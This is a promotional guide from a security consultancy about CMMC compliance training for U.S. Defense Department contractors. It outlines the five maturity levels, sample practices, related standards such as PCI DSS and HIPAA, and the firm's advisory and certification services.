Cybersecurity is a crucial concern for every business in the world. No matter the kind or size of organization, it’s always imperative to safeguard against cybercrime to prevent loss of sensitive information and other related risks, such as theft and extortion. The threats posed by hackers and other bad actors are even more significant when it comes to matters of national security.
That’s why all contractors with the United States Department of Defense (DoD) are held to the most stringent standards for cybersecurity. The newest version of those requirements, the Cybersecurity Maturity Model Certification (CMMC), will necessitate industry-wide revamping of all cybersecurity measures. Most of all, it’ll require training for all stakeholders.
This guide will walk through how to get that CMMC certification training off the ground.
How to Conduct CMMC Employee Training
Knowledge is power. As with the implementation of any new normal the most important aspect of compliance with CMMC will be intensive training that instills a deep knowledge of its requirements across your organization.
Every individual in a position to impact or influence your organization’s cyberdefense systems needs to have a solid grasp of:
- What CMMC requires and what changes need to be made
- The current cybersecurity measures and needs of the company
First and foremost, a deep theoretical and practical understanding of what CMMC is and what it requires must be instilled in all decision makers. Then, to ascertain the cybersecurity profile of your company, internal or external analysis of all strengths and weaknesses is necessary.
Finally, company-wide and targeted programs like required reading and workshops transmit this practical knowledge to all staff and stakeholders, cultivating a culture of learning.
A corporate culture that prizes learning is one that prizes safety.
But before learning how to implement CMMC, let’s look at what it is on a fundamental level.
Basic Overview: What is CMMC?
The CMMC was created to better secure the DoD from attacks to its supply chain and the entire Defense Industrial Base (DIB) sector. This sector includes over 300,000 businesses, across various industries. All of these organizations support the DoD and overall security of every American citizen through research and development of all Defense systems and services.
All DoD operations depend upon the security of its sensitive data.
Specifically, one of the biggest focuses of the CMMC is the protection of extremely sensitive and important forms of unclassified information. The two main types are:
- Federal contract information (FCI) – All information that was created by or for the federal government under contract but is not intended for public use or access.
- Controlled unclassified information (CUI) – Sensitive information that is legally required to be protected, but not specifically labeled “classified,” including:
- Critical infrastructure
- International agreements
- Procurement and acquisition
- Natural and cultural resources
- Proprietary business information
All DoD contractors must ensure the basic safeguarding of all FCI, per the Federal Acquisition Regulation (FAR) clause 52.204-21. They must also ensure the security requirements of all CUI, per the Defense Federal Acquisition Regulation Supplement (DFARS) clause 252.204-7012.
In order to do so, all cyberdefenses must now be guaranteed by a certified third party assessment organization (C3PAO).
Installing this basic knowledge of CMMC will enable everyone in your company to…
Develop a Deep Understanding of CMMC Requirements
The CMMC is a revolutionary paradigm that measures the overall effectiveness of your organization’s cybersecurity across a number of processes and practices. For each process and practice, there are expected protocols divided across 17 domains or areas (Access Control, etc.). These protocols pair together to form cumulative “levels” of model maturity.
There are five levels in total, and each one builds on the last:
- Performed processes, basic cyber hygiene practices
- Documented processes, Intermediate cyber hygiene practices
- Managed processes, good cyber hygiene practices
- Reviewed processes, proactive practices
- Optimizing processes, advanced/proactive practices
An organization that has achieved level five will, by definition, also satisfy levels one through four.
Alternatively, another way to conceptualize these levels is by understanding their target outcomes as they build upon each other:
- Level 1: Safeguarding all FCI
- Level 2: Transitioning to protection for CUI
- Level 3: Fully protecting all CUI
- Levels 4-5: Reducing risk of advanced persistent threats (APT)
Now, let’s go over the actual requirements for each level:
CMMC Level 1: Basic Cyber Hygiene and Performance
The requirements for the first level are:
- Practices: Basic Cyber Hygiene – The practices required for this level correspond to the “Basic Safeguarding of Covered Contractor Information Systems” laid out in 48 CFR 52.204-21. Some examples include:
- Identification and Authentication (IA) 1.076: Identify all users and processes acting on behalf of users on all information systems
- Access Control (AC) 1.001: Limit access to information systems to only authorized users or processes acting on their behalf
- Media Protection (MP) 1.118: All media containing FCI must be sanitized thoroughly before release or disposal
- Processes: Performed – At this level, the practices are merely required to be performed, and process maturity as such is not measured. This accommodates the fact that the practices required are ad-hoc and not measurable on a consistent basis.
Level one is the simplest and most basic level. It introduces 17 practices, but there is no measured assessment of the process maturity yet; that kicks in at level two.
CMMC Level 2: Intermediate Cyber Hygiene and Documentation
The requirements for the second level are:
- Practices: Intermediate Cyber Hygiene – These practices guide the progression out of level one and into level three. Developed from the core of NIST SP 800-171 and other standards, they include the following:
- Recovery (RE) 2.137: Regular test and performance of data backup
- Personnel Security (PS) 2.127: Screen all individuals given access to CUI
- Processes: Documented – At this stage organizations are required to not only perform all required practices of each level, but also document these developments thoroughly.
This level introduces measures for process maturity, as well as an additional 55 practices. However, as noted above, this level is intended as a transitional level preparing for level three.
CMMC Level 3: Good Cyber Hygiene and Management
The requirements for the third level are:
- Practices: Good Cyber Hygiene – This level finalizes the protection of CUI, cementing all of NIST SP 800-171, as well as several additional best practices from other sources. These practices include:
- Asset Management (AM) 3.036: Establish clear, consistent definitions for all procedures related to handling of CUI
- Awareness and Training (AT) 3.058: Train personnel on specific indicators and solutions for threats from within the organization
- Processes: Managed – At this maturity level, all practices are not only documented, but also carefully and actively managed. The organization must produce a plan for management for all cybersecurity practices.
Level three completes the entirety of NIST SP 800-171 requirements, adding 58 practices for a total of 130. At this stage, the “hygenic” elements are complete, and your organization is ready for more advanced, proactive cyberdefenses.
CMMC Level 4: Proactivity and Review
The requirements for the fourth level are:
- Practices: Proactive – Moving beyond the standard protections detailed in the previous levels, level four begins to implement defenses against APTs.These include standards from Draft NIST SP 800-171B and other best practices. Some include:
- Configuration Management (CM) 4.073: Vet all systems and applications identified by the organization and whitelist accordingly
- Incident Response (IR) 4.100: Mobilize knowledge of attackers’ tactics to inform all planning and execution of incident response strategy
- Processes: Reviewed – At this stage the organization must move beyond basic management of all practices and incorporate intensive review. In addition corrective action must be taken where necessary.
Level four introduces 26 additional practices that begin to draw most heavily from industry-specific analyses and standards above and beyond NIST guidelines. These practices set the stage for an ongoing process of permanent optimization, bridging into…
CMMC Level 5: Advanced, Progressive, and Optimized
The requirements for the fifth level are:
- Practices: Advanced/ Proactive – These practices further cement protection of CUI from all existing and potential APT. These innovative, cutting-edge practices include:
- System and Communications Protection (SC) 5.198: Monitor and record all packets that pass through the internet network and other boundaries
- System and Information Integrity (SI) 5.222: Perform analysis of systems’ and individuals’ behavior to proactively treat dangerous commands and scripts
- Processes: Optimizing – This final maturity level involves an ongoing process of optimization, including all of the above processes as well as institution-wide implementation. Hence the importance of training.
Level five introduces 15 additional practices, bringing the running total up to 171 practices for full-fledged process maturity. However, this figure is subject to change over time, as the practices that are considered proactive today may become simply baseline or reactive practices over time. As technology develops cybercrime becomes increasingly complex.
That’s why, in addition to understanding CMMC inside and out, you also need to have an in-depth knowledge of what cyberdefense looks like at your organization.
Assess Your Current Cybersecurity Situation
Compliance with the CMMC is far from the only cyberdefense concern facing your organization.
The CMMC mandate builds on requirements and protocols of other existing norms, enhancing your overall cybersecurity profile. That said, compliance with and company-wide buy in to CMMC requires a detailed knowledge of the existing cybersecurity situation.
This includes a detailed understanding of:
- Existing legal and industry-wide protocols
- Securities and vulnerabilities in place
Once a knowledge base is established, dissemination of this information through training is possible. Through targeted testing and company-wide solutions like seminars and workshops, all personnel can be brought up to speed—once that speed is identified.
Other, Coexisting Protocols
Not all DoD contractors are the same. There are many different industries and companies that constitute and contribute to the DIB and DoD supply chain. And many of these individual companies sit at the intersection of several different networks of cybersecurity requirements.
Some of the other interlocking systems of protection you may need to abide by include:
- PCI DSS – If any part of your business involves receiving credit card payments for goods or services, you need to become PCI DSS compliant to reduce the threat of financial harm to you and all who come in contact with your business.
- NERC CIP – DoD contractors involved in the bulk power system (BPS) across North America must comply with the NERC CIP Reliability Standards to ensure the uninterrupted flow of power and prevent compromises to national security.
- HIPAA / HITECH – All DoD contractors who provide health care and health-adjacent services must ensure HIPAA and HITECH compliance for the process of how personal health information (PHI) is generated, processed, and stored.
All of these standards require securities similar to those specified above. In some cases they may overlap. But redundancies are not a problem in security; in fact, having multiple layers of defense is key to safeguarding your data from the ever-evolving methods of cybercriminals.
Compliance isn’t the end of cybersecurity; it’s just the beginning.
Know Your Strengths and Weaknesses
Compliance assures that, in theory, your business is safe from hackers and other digital threats. But the only way to truly know how safe your organization is? Testing your defenses.
And sometimes, the best defense is a strong offense.
- How a hacker could potential enter your systems
- What points of entry (vulnerabilities) exits
- What a hacker could do once inside
- How quickly a hacker could gain total control
Knowing these vulnerabilities and points of weakness is the key to being able to patch them. That, in turn, is key to training and company-wide implementation of cybersecurity.
Certain cybersecurity standards require pen testing. But even where it isn’t required, pen testing is one of the best ways to shore up your cyberdefenses, making your sensitive data impervious to all kinds of attacks.
For that and all other cybersecurity needs, we’re here to help.
Optimize Your Cybersecurity With RSI Security
In order to attain full CMMC compliance, training is one of the biggest challenges to overcome. To help prepare your organization for all changes it will require, RSI Security offers a comprehensive CMMC advisory services package. Our qualified experts will take care of CMMC certification training for you, walking through the implementation of all requirements detailed above.
But that’s not all.
RSI Security will be a C3PAO as soon as the certification process becomes available. So, we can get you ready for certification, then certify you once the next step is required.
In addition, RSI Security is your first and best option for overall cybersecurity optimization. That includes all other compliances noted above, as well as in-depth analysis, and customized cyberdefense solutions tailor-made for your company
For all your cybersecurity needs, contact RSI today!